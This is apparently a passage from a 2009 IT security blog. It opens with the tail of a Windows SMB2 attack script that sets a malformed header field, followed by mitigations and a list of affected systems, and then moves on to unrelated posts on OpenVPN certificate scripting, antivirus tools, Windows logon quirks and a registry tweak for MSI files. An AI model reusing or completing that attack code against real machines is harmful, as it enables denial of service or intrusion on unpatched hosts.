"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
s = socket()

Be responsible, exploit test machines only :D please

Mitigation techniques:

1) Disable SMB / File and Print Sharing (this is tough …i know)
2) Enable a host-level IDS to detect this signature, or write your own.
3) Enable firewalls to block SMB traffic from unknown sources (in the hope that no one does this from the so-called trusted network)

The following platforms are vulnerable (I didn’t test them personally though):

Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta

And to add from my test: Windows 2008 with SP2.

Microsoft posted this advisory, but basically it doesn’t fix anything; it only gives a workaround, which is to disable SMB(2):

Friday, September 4, 2009

openVPN easyrsa batch em "build-key"

We were deploying a solution for our customer, Pizza Hut/KFC Malaysia, which uses pfSense as a VPN gateway and firewall for a little under 300 outlets in Malaysia.

Each outlet has a unique “storeID”, which is then required to run the OpenVPN daemon in the background and fire up a connection whenever a layer 2 link is established.

Creating just under 300 certificates with OpenVPN’s (v2.x.x) easy-rsa scripts on a CentOS client isn’t fun. So, being lazy, I wrote a simple way to create these files fast!

This assumes you’ve got the whole OpenVPN and pfSense setup sorted. If not, read the great document here. Once you’ve got the server side done on pfSense, you will need to generate peer certificates for (in this case Pizza Hut’s) 300 branches.

Snail factor

  • build-key prompts, amongst other things, for the commonName (server name) each time a certificate is generated

What is needed?

  • A way to create store certificates without any prompts, using a $variable$ to “insert” the commonName value. This means a certificate set is created as storeID.key, storeID.crt and storeID.csr

How - Conceptually?

  1. Automate the build-key file so it no longer prompts
  2. Fire a variable into the environment; the scripts pick up that $variable$, which then becomes both the filename and the commonName

How – Technically

(Assumptions: easyrsa is in /etc/openvpn/easyrsa and keys are in /etc/openvpn/easyrsa/keys. In easyrsa, you have all the scripts like build-ca and build-key.)

Create a file called build_batch in /etc/openvpn/easyrsa with the following lines, and make the file executable with chmod +x build_batch


#!/bin/sh
if test $# -ne 1; then
    echo "usage: build_batch <name>";
    exit 1
fi
# openssl.cnf picks this up as commonName_default via $ENV::KEY_CNAME
export KEY_CNAME="$1"
./build-key "$1"

Now, edit (nano/vi) the openssl.cnf file in /etc/openvpn/easyrsa and look for the following lines

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

Add a new line like below and save the file.

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

# Add this line below
commonName_default        = $ENV::KEY_CNAME

Now, edit (nano/vi) the build-key script in that same directory. At the end of the openssl req and openssl ca statements, add the -batch argument.

This is how part of the original file looks:

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -config $KEY_CONFIG && \

We modify it to add -batch somewhere on each of those lines, like below, and save the file

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -batch -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -batch -config $KEY_CONFIG && \

Now you’re ready to run in batch. But before that, feed the vars into the environment, like below, from /etc/openvpn/easyrsa

source vars

Run a sample like below

./build_batch test01

This builds test01.crt, test01.csr and test01.key automatically in /etc/openvpn/easyrsa/keys, with the commonName test01 as well :)


Now, if you want to do lots of these, use this Excel below


Use the Excel file (build-cert sheet) to generate script lines (see the Excel sample) so you can copy and paste them into an SSH remote session in the appropriate directory.

Copy up to 50 lines at a time (within the paste buffer) from the copypaster column and paste them via an SSH session in /etc/openvpn/easyrsa; it will generate everything without prompting for anything. Quick and easy.
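As an added example (this is not the author’s build_batch script or the Excel sheet, nor part of easy-rsa itself), here is a POSIX sh wrapper that does what the copypaster column does: it reads store IDs from a file, one per line, and builds each certificate non-interactively. It assumes the build-key/-batch and commonName_default=$ENV::KEY_CNAME changes described above have already been made, that `source vars` has been run in the same shell, and that easyrsa lives in /etc/openvpn/easyrsa (overridable through the EASYRSA_DIR, KEY_DIR and BUILD_KEY variables, which are this example’s own). Because a store ID ends up both as a file name under keys/ and as an X.509 commonName, the wrapper rejects IDs outside a conservative character set, and it refuses to rebuild an ID whose key already exists so that a re-run never silently overwrites an issued key pair.

```shell
#!/bin/sh
# build_batch_list: build one OpenVPN client certificate per store ID, in batch.
# Added example; assumes easy-rsa 2.x patched as described in the post above
# and that `source vars` has already been done in this shell.

EASYRSA_DIR="${EASYRSA_DIR:-/etc/openvpn/easyrsa}"
KEY_DIR="${KEY_DIR:-$EASYRSA_DIR/keys}"
BUILD_KEY="${BUILD_KEY:-$EASYRSA_DIR/build-key}"   # command used to build one cert

# A store ID becomes a file name and a commonName, so allow only letters,
# digits, '_', '.', '-', and no leading dot (rules out '', '..', '/', ';', spaces).
valid_store_id() {
    case "$1" in
        '' | *[!A-Za-z0-9_.-]* | .* ) return 1 ;;
        * ) return 0 ;;
    esac
}

# Build one certificate. Returns 2 for an invalid ID, 3 if the key already
# exists (never overwrite an issued key pair), otherwise build-key's status.
build_one() {
    id="$1"
    if ! valid_store_id "$id"; then
        echo "SKIP $id: invalid store ID" >&2
        return 2
    fi
    if [ -e "$KEY_DIR/$id.key" ]; then
        echo "SKIP $id: key already exists" >&2
        return 3
    fi
    export KEY_CNAME="$id"        # openssl.cnf reads this as commonName_default
    "$BUILD_KEY" "$id"
}

# Read store IDs (one per line, blank lines ignored) from the file named in $1
# and build each. Returns 0 only if every ID was built.
batch_build() {
    rc=0
    while IFS= read -r id || [ -n "$id" ]; do
        [ -z "$id" ] && continue
        build_one "$id" || rc=1
    done < "$1"
    return $rc
}

# Stand-alone use: ./build_batch_list stores.txt (run from /etc/openvpn/easyrsa)
if [ $# -eq 1 ]; then
    batch_build "$1"
fi
```

Run it from /etc/openvpn/easyrsa after `source vars`, with a plain text file of store IDs; anything skipped is reported on stderr and the exit status tells you whether the whole batch went through cleanly.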


To remove/revoke certs, do the same but use the Excel’s revoke-cert sheet.


<Ignore CRL/STR_COPY issues, I don’t have CRLs defined>

If things mess up a lot, just run ./clean-all. Warning: this removes your CA, server and dh information, which you then need to repopulate inside pfSense.


After clean-all you must recreate all of the below


Then re-run the above stuff.

Monday, August 24, 2009

Microsoft Security Essentials 1.0 BETA vs. Kaspersky 2010

My colleague Henry asked me to scan his USB stick; he suspected a virus was lurking in there. I have both Kaspersky and MSE running in real time.

MSE detected it and Kaspersky snoozed!

It was Win32/Vorus.CV


And MSE cleaned it. I am confident in this product. Since it’s gonna be free, I am a full supporter and advocate of MSE. Try it and have a trouble-free computing environment.

PS> Want a copy of MSE? I can give it to you, but you have to write to me with your email addy.


Saturday, August 22, 2009

Immunet - Antivirus Cloud Computing

Immunet, a startup by Symantec senior execs, takes antivirus to the cloud. Immunet attempts to aggregate the results and "opinions" on threats from the people using the service. This means that if Bob gets an infection in Saudi Arabia, Immunet, alongside your antivirus, updates everyone in the Immunet community about the threat in real time, so they are protected from it.
They also plan to protect social networking and other communities (probably Twitter, etc.).
Interesting concept. Cloud computing antivirus.

In summary, every single Immunet user becomes a possible contributor to protecting all other Immunet users in real time.
Checkout their narrative:
Immunet Protect is free, light weight, cloud based Anti-Virus software which uses new approaches to provide malware protection. It is designed to work alongside Symantec, AVG and Mcafee to provide significantly improved detection rates in those products. You can also install it alone. Immunet works by providing its own fast and light layer of cloud based virus detection on top of your existing Anti-Virus product. Once you have Immunet installed it ties you into the Immunet Cloud and allows you to build communities of friends and family. When Immunet Protect detects a threat on your system it automatically makes available protections for it to everyone in your community and to the global community protecting them instantly.
Check it out and download it. It doesn’t work on my Windows 7 x64 RTM tho :(. So I had to put it on my XP32 box running AVG. Perfect!
Currently, this product works better with those three AV products. I am using Kaspersky + Microsoft Security Essentials Beta, so I probably won’t benefit much, apart from some security information when a bug/security threat is detected on Windows (not sure.. shall try).
Microsoft Windows XP with Service Pack 2 or later
* 300MHz or faster processor
* 256MB of RAM
* 10 MB of available hard disk space
Microsoft Windows Vista Home Basic/Home Premium
* Supports 32-bit platforms only at this time
* Must meet the minimum Windows Vista operating system requirements
Windows 7 (RC)
* Supports 32-bit platforms only at this time
* Must meet the minimum Windows 7 (RC) operating system requirements
Required for all installations:
* A working Internet connection
Note: this product is a pre-release, i.e. BETA, so use it with discretion.
Above: number of people online and threats it can clean!!! Not bad.
INTERESTING. About 20 minutes into writing this, the protection count went up by 2!!!!!… SUPER COOL. There were no updates or downloads of threat patterns. Real time, hell yeah!
If I click the threat meter..
nsDialogs.dll is apparently “safe”
Settings and such.
To participate, you need to register. Without registering you won’t be able to “help” others :)
Click on register and go get a new account at Then immediately sign in and you should be able to see like below;
Join the cloud? Let us know the experiences.

Thursday, August 13, 2009

My views on free VS. premiere security products.. and Microsoft’s Antivirus?

It's interesting how one AV product suppresses another in just a matter of months. Look at the graphs produced by those so-called independent testers. A sample here. It's a big war between AV companies out there.
My problem is, it's sickening that we as consumers are always confused by all their gimmicks about free vs. premiere/paid editions. You cannot do that with security products! <period>. Give it 100% or don’t give it at all.
My take on it is, if you want to give something away free, give it 100% (and the world shall love you for it). Tearing down features for free vs. full versions is like saying "you get the car for free but the brakes only work 50%. So be careful. If you want full braking then you need to pay". This is their message, as I see it. This is also why the open source world keeps propelling forward and gaining mileage. They fall under the GPL, which does not allow licenses to be sold, so how do they profit? Professional support and services...
Know this… I am not talking about features; that’s different. Maybe your security product performs system-wide application updates; now, that’s a feature. Security, such as filtering through different protocols, email filtering or web filtering, for example, shouldn’t be a “paid” extra; it should just be standard.

Anyway, Microsoft will also soon be in the chase, prime time. It's called MS Security Essentials, dubbed Morro, a new free AV for PCs (they’ve stopped beta test downloads already, so it's getting ready for RC).

Combined with Security Center, Windows Update and the MS Firewall, it's almost a full desktop security suite. However, it has yet to face the real-world challenge; this is a fact. So, wait till it releases and we shall all see. (Word to note: HOME PC…) So, not sure where this is going for corporations yet.
From a commercial point of view this service will seriously dent the rest of the commercial AV market, no doubt, but again, I would rather get an AV that is 100% free than one of those "free but we won’t give you 100% brakes" ones... This is good for consumers; the competition will ease off our pockets for sure.
I bet there will be certain camps that will say it's from Microsoft, we can't trust it, bla bla. Just so you know, MS products are seriously “tested” (i.e. smothered and smacked) by millions of testers worldwide as soon as they see daylight, every second, even at the point I am writing this. This is why you get lots of "bugs/problems" reported, so effectively, for me, as a security paranoiac, I would rather have those bugs exposed and fixed than have/use a product that no one knows is a big ass Swiss cheese or not. I don’t really care about the games the corporations play; I just want good quality software.

Wednesday, August 12, 2009

Possible new breed of mass-spreading worms? New vulnerabilities found in MS products.

Microsoft Office OWC10.Spreadsheet ActiveX BorderAround() Heap Corruption Vulnerability

The specific vulnerability exists in the OWC10.Spreadsheet.10 ActiveX control installed by Microsoft Office. By accessing specific methods in a certain order heap corruption occurs leading to remote code execution. If exploited, complete control of the affected system can be achieved under the rights of the currently logged in user.
This looks like a perfect candidate for a mass-spreading worm: a newly discovered (and patched) vulnerability in Microsoft Office Web Components. Affected products:
  • Office XP, Office XP Web Components, and Office 2000 Web Components (all editions)
  • Office 2003, Office 2003 Web Components, and Office 2003 Web Components for the 2007 Microsoft Office system (all editions)
  • Internet Security and Acceleration Server 2004 and Internet Security and Acceleration Server 2006 (all editions)
  • Microsoft BizTalk Server (all editions)
  • Visual Studio .NET 2003 (all editions)
  • Microsoft Office Small Business Accounting 2006 (all editions)
Especially for those running ISA Server, this is seriously critical. You must get patched, get secure.
Since the exploit runs with the permissions of the logged-on user, it is possible that UAC will prevent the remote exploit attempt from performing privileged tasks.
Patch immediately or stand a chance of becoming part of the statistics (hopefully not).

Monday, August 10, 2009

Logging on to Windows 2008 domain as an administrator on Windows 7 domain computer

This has probably been blogged a thousand times, but let me be the 1001st .. blogger ;).

Thought I’d share this from Windows 7 perspective instead.

So, here’s the rundown:

  • I got myself W2008 R2 and Windows 7 RTM up and running, joined the domain and stuff.

Ok, so the thing is, when you use the logon UI in Vista/Windows 7, it does “see” the domain it just joined and sets it up for you as your default domain (there’s no more domain pull-down list).


Notice the part where it says “Log on to: BEAUTISEC”? Well, BEAUTISEC is my domain, so you can skip the BEAUTISEC\username way of logging on and just go with username. If you want to log on to a domain other than BEAUTISEC, do/see this …


So, let's say I've got a domain called MSFT; I would need to log on as MSFT\user. But since I am in my primary domain, i.e. BEAUTISEC, I don’t have to; I just log on.

I log on as user sanjay with my password and it just works. But when I log on as administrator, it doesn’t. Here’s why:

For administrator accounts

In the above scenario, local administrator logons take precedence unless you specify the domain before the logon name, like BEAUTISEC\administrator, which is your domain administrator account. Then you get to log on as the domain “administrator” account.

See this screen below when I key in administrator (NOTE: the administrator here is the default built-in administrator user for that PC; it could be renamed to admin or papasmurf and the effect below is still the same)


The “Log on to” value is automatically set to BEAUTIFULPC, which is the local PC name, i.e. a local logon. This “feature” also lets someone figure out the name of the local built-in admin account even before logging on, but yea.. moving on..

For regular accounts

Domain logons always take precedence unless you specify BEAUTIFULPC\<username> to log on to local accounts, in other words accounts other than the built-in administrator account. (See my note above about the local admin account)


The “Log on to” value automatically changes to my domain, BEAUTISEC.

SIDE NOTE: You can’t switch to the classic logon interface on Vista/Windows 7 machines that are part of a domain, like you could in XP. But you can enable the “Interactive logon: Do not display last user name” policy through the registry or GPO (or gpedit locally). That lets you enter your username manually, but still no domain pull-downs like in the old days. ):

Saturday, August 8, 2009

My first Windows 7 BSOD


This happened when I was extracting a 7zip file and launching Google Chrome at around the same time. I noticed that Kaspersky had reported some anti-phishing activity around the same time, when I was accessing a website.

Case: Win 7 64-bit RTM, Kaspersky Internet Security 2010, Google Chrome Beta 3, extraction of a 7z file using WinRAR for Windows.

Windows 7 (RC, RTM) and static disk activity (about a minute of pause)

I had been running into this problem since I got the RC build of Windows 7. I didn’t much bother, as I was patient enough to wait till things started to work again (which they eventually do), and I also figured it might be fixed by the time RTM was out.
Well, that isn’t the case. Now I am on the official RTM build (and 64-bit) and it still chokes every once in a while (similar to what I had on the RC 32-bit).
Every so often, the disk activity light for the SATA disk on my cheapo Dell Inspiron 1525 stayed on with a static blink, like continuous disk activity or as though there was a hardware failure on the disk. This causes newly launched apps, or older ones that are already running, to freeze momentarily for about 30 seconds to 1 minute. This problem didn’t appear when I used Ubuntu 9.04 on this exact same system.
Well, I found the problem (or more like the solution). It was the AHCI setting in my BIOS that causes this to happen (when I turned it to ATA mode, this problem didn’t crop up). This is also related to an older SATA HDD I inserted into my new Dell (the older SATA disk had a higher RPM, so I decided to use that instead).
So if you get this annoying problem every once in a while, load up your BIOS, go to your SATA disk configuration, turn off AHCI and turn off flash cache (this is required, according to the BIOS setting, when you turn off AHCI).
Now, I am at peace :)
(NOTE: Some OSes, including 7 BETA, will not boot well according to some internet searching I did, so if things break, read the next line.)
Use Ubuntu.

Thanks to my colleague Feroz Khan for the idea and for this little snippet below from the wiki link on AHCI above.

Friday, August 7, 2009

Check Point SSL Network Extender and Windows 7

If you use an older version of SSL Network Extender (SNEX) and run the new Windows 7 (Beta, RC or RTM) on a 64-bit architecture, you may get errors through both ActiveX and Java stating that it failed to load. This is confirmed by Check Point, and you need a new file.

You can fix this by manually downloading the SNEX client from CP’s website, or click here to update your older SNEX client. This should get you up and running in no time. Finally, get your admins to update their CPFW’s SNEX source files, available from this article on CP’s website, so other users are upgraded automatically as well.

Here’s a screenie.


Oh, by the way, I am running Windows 7 64-bit RTM. :D. Have a great weekend.

Malaysia for Internet Censorship? Vain Move. 5 reasons why.

I read the Star article and this one on Nasdaq about Internet censorship. I think this is simply a vain move by our government. Why?

  1. Nobody should play God, especially when it comes to information and information disclosure! Who determines whether a site is politically “compliant” or not? Who determines whether a particular site is “racial” or simply stating the obvious? Who determines whether a particular site is “good” or “bad”? Are those who decide being objective?
  2. No technology in the world can stop people accessing sites if they want to. China tried, but people could still get to the sites “banned” by the government. When I was in Beijing in 2005, they blocked access to certain sites. All I had to do was get myself a public proxy residing outside China and I could access those “banned” sites (to name one of a few methods; see this link for the VPN feature: a VPN keeps everything within an encrypted tunnel, so no one sees anything. And other ways, of course :). I will definitely blog a comprehensive list if this were to materialize. :P
  3. It will slow things down even more. Putting up filters will undoubtedly slow things down. In fact, any device between you and the host/server you access can potentially slow stuff down, especially if the filtering is at the application layer (as in this particular censorship case). Not to forget, we already have a substandard internet!
  4. Nobody will be happy to know that EVERYTHING they do is now potentially INTERCEPTED. Those blocking tools basically take the headers and certain data from your internet transactions and “analyze” them against their policy for an ACK or NACK. So, YES, EVERYTHING IS PICKED UP.
  5. It will create unnecessary workload: managing and maintaining the list of sites to be blocked (sites bloom faster than fungi on soggy bread), managing the devices, managing the people managing the devices, etc..

Instead, the powers that be should educate users, and encourage and promote wise use of the internet, letting users decide how they would like to use this facility. Give them the option to opt in to a censorship program if they like, by installing a piece of software, etc. Promote healthy thinking. Build trust with the people, but also keep the law intact. Enforcement of cyber laws is really in its infancy here. This should be the first move.

Wednesday, August 5, 2009

MSI and Run As Administrator

Some MSI programs require elevated privileges to run, and it’s always cumbersome to run them through runas.

In Windows Vista/7, the shell integration (right-click menu) of an EXE contains a Run as administrator entry, like below.


But for MSI files, there’s no such context menu entry! Of course, there are other ways, but this right-click thingy is what I want; it’s quick and easy.


MSI files do not have the Run as administrator shell integration.

How do you make Run as administrator integrate with MSI and other file types (e.g. VBS, MSI, BAT)? Try this.

For MSIs

Start notepad.exe and paste the below text exactly

Windows Registry Editor Version 5.00



Don’t worry about the text running off the edge of what you can see; just copy and paste the whole table. When you paste the above, it MUST look something like this:


If it doesn’t, stop right there; something is not right. Try again.

Now save this document as shell_enable_msi.reg (the filename doesn’t matter, as long as the extension is .reg). Make sure the registry icon appears after you do that, like below.


This means it’s associated with the Registry Editor. Now double-click the icon; UAC will complain, but just say yes on both counts!



Once imported, you should see this;


Now try again with that MSI extension. Voila!


And there you go.

Anyway, in case you’re curious what all that jargon you pasted into your registry is, it’s nothing much; it’s actually…
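As an added example, not the author’s own .reg file (which is not reproduced on this page), here are registry entries that achieve the same thing: a Run as administrator verb on the context menu of .msi files. It assumes the stock Windows file association, where .msi maps to the Msi.Package ProgID, and that msiexec.exe is reachable on PATH (it lives in System32). The verb is deliberately named runas, because that is the verb name Explorer treats as “elevate via UAC”; HasLUAShield only decorates the menu entry with the shield icon.

```reg
Windows Registry Editor Version 5.00

; Adds a "Run as administrator" verb to the context menu of .msi files.
; Naming the verb "runas" is what makes Explorer request UAC elevation;
; HasLUAShield only adds the shield icon to the menu entry.
[HKEY_CLASSES_ROOT\Msi.Package\shell\runas]
@="Run as &administrator"
"HasLUAShield"=""

; msiexec is started elevated with the selected package (%1) as the install target.
[HKEY_CLASSES_ROOT\Msi.Package\shell\runas\command]
@="msiexec.exe /i \"%1\" %*"
```

A .reg file writes straight into HKEY_CLASSES_ROOT when imported, so read what it contains before double-clicking it; this one touches only the Msi.Package\shell\runas key, and deleting that key in regedit removes the menu entry again.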